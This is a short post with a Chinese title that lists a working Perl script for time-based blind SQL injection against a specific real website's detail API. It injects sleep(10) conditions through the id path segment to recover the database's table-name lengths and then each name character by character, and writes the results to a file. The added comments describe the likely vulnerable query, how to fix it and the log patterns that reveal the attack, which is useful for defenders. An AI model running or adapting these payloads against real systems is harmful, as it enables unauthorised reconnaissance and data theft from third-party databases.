一个基于时间盲注(time-based blind SQL injection)的 Perl 小脚本

 1 use strict;
 2 use warnings;
 3 use LWP::Simple;
 4 
   # Purpose: time-based blind SQL injection probe against one hard-coded URL.
   # Phase 1 infers the length of the table name at each LIMIT offset 0..49,
   # phase 2 infers each name one character at a time, and the result is
   # printed and appended to back.txt. The only signal read from the server is
   # how long each request takes; response bodies are never inspected.
   #
   # Defender's reading of this listing:
   #  - The payload closes a parenthesis after the id value and appends its own
   #    condition, so the id path segment presumably reaches a SQL statement
   #    without parameter binding (inferred from the payload shape; the server
   #    code is not shown). Binding the id as a parameter, or rejecting
   #    anything that is not an integer before the query is built, removes the
   #    channel this script depends on.
   #  - Every probe is a GET whose path contains `information_schema`,
   #    `sleep(` and a trailing `-- -`, sent strictly one after another (up to
   #    50 x 30 requests in phase 1 alone), and each matching probe keeps a
   #    request open for about 10 s. Those strings, that volume and that
   #    latency pattern are what access logs, WAF rules and slow-query logs
   #    can key on.
 5 my %table_and_leng;
   # Phase 1. $count is the zero-based LIMIT offset, i.e. which table is probed.
 6 for(my $count = 0;$count <= 49;$count++){
 7     #print "Test Table: $count\n";
 8     my $table_length=1;
       # One-based table number, used only in the progress messages.
 9     my $swap = $count+1;
       # Candidate lengths 1..30 are tried in order until one matches.
10     while($table_length <= 30){
11         
12         print "Test Table($swap), and table_length($table_length)\n";
           # time has one-second resolution, so the measured duration is a
           # whole number of seconds.
13         my $start_time = time;
           # The injected condition makes the database sleep 10 s when the
           # table name at offset $count is exactly $table_length characters
           # long. get()'s return value is discarded, so a failed request is
           # not told apart from a fast one.
14         get("http://www.bjmzdx.org/home/api/detail/cateId/834/id/4698) and ( if(length((select table_name from information_schema.tables where table_schema=database() limit $count,1))=$table_length,sleep(10),1) )-- -.html");
15         my $end_time = time;
16         my $fish_time = $end_time-$start_time;
           # A request that took at least 10 s is read as "length matched".
17         if($fish_time >= 10){
18             print "The $swap talbe_length:$table_length\n";
19             $table_and_leng{$count} = $table_length;
20             last;
21         }
22         $table_length++;
23     }
       # If no candidate matched, no entry is stored for this offset.
24 
25 
26 }
   # Dump the offset => length map. sort without a comparator orders the keys
   # as strings, so 10 is listed before 2.
27 foreach my $keys(sort keys %table_and_leng){
28         print "$keys => $table_and_leng{$keys}\n";
29 }
30 print "All table length is Done, sleep(30)";
   # Fixed 30 s pause between the two phases.
31 sleep(30);
32 
   # Phase 2. Maps each LIMIT offset to the table name reconstructed for it.
33 my %all_tables;
34 for(my $table_count=0;$table_count <=49;$table_count++){
       # One-based table number, used only in the progress messages.
35     my $table_count_swap = $table_count+1;
       # Characters recovered so far for this table, in position order.
36     my @table;
       # $count is the one-based character position handed to substr(). For an
       # offset with no stored length the bound is undef: the loop body never
       # runs (an uninitialized-value warning is emitted) and the name stays
       # empty.
37     for(my $count=1;$count<=$table_and_leng{$table_count}; $count++){
           # Candidates are a-z, A-Z, 0-9 and the listed punctuation, tried in
           # this order; the first one that triggers the delay is kept.
38         foreach my $char('a'..'z','A'..'Z',0..9,'_','!','@','#','$','%','^','&','*','(',')'){
39             print "Guess $table_count_swap ->  $char\n";
40             my $start_time = time;
               # Same timing oracle as phase 1, comparing one character of the
               # table name with $char. The return value is discarded again.
41             get("http://www.bjmzdx.org/home/api/detail/cateId/834/id/4698) and (   if((substr(  (select table_name from information_schema.tables where table_schema=database() limit $table_count,1),$count,1)='".$char."')  ,sleep(10),1)   )-- -.html");
42             my $end_time = time;
43             my $fish_time = $end_time-$start_time;
44             if($fish_time >= 10){
45                 print "The Char:$char\n";
46                 push @table, $char;
47                 last;
48                 
49             }
50             
51         }
           # If no candidate matched, nothing is pushed for this position, so
           # the joined name comes out shorter than the stored length.
52     }
53     my $table_swap = join('',@table);
54     
55     print "The $table_count_swap is:$table_swap\n";
56     $all_tables{$table_count} = $table_swap;
57 }
58 
   # Append the results to back.txt in the current directory.
   # NOTE(review): two-argument open on a bareword handle, and DATA is also
   # the name Perl uses for the __DATA__/__END__ section handle. A
   # three-argument open with a lexical handle is the safer form.
59 open DATA, ">> back.txt" or die "Cannot write to file:$!\n";
60 print "\n\n------------------------------------------------------\n";
   # Keys are sorted as strings here as well (10 before 2).
61 foreach my $table_keys(sort keys %all_tables){
62         print "$table_keys => $all_tables{$table_keys}\n";
           # One tab-separated line per offset: offset, then recovered name.
63         print DATA "$table_keys\t$all_tables{$table_keys}\n";
64 }
65 print "------------------------------------------------------\n";
   # The result of close is not checked, so a failed buffered write would go
   # unnoticed.
66 close DATA;
67 print "All Done, Please Check the file:back.txt in current dir.\n";
68 print "Done!\n";

关键是用 time 取得请求前后的时间:两次取值之差达到 10 秒,就说明注入的条件成立、数据库执行了 sleep(10)。

 
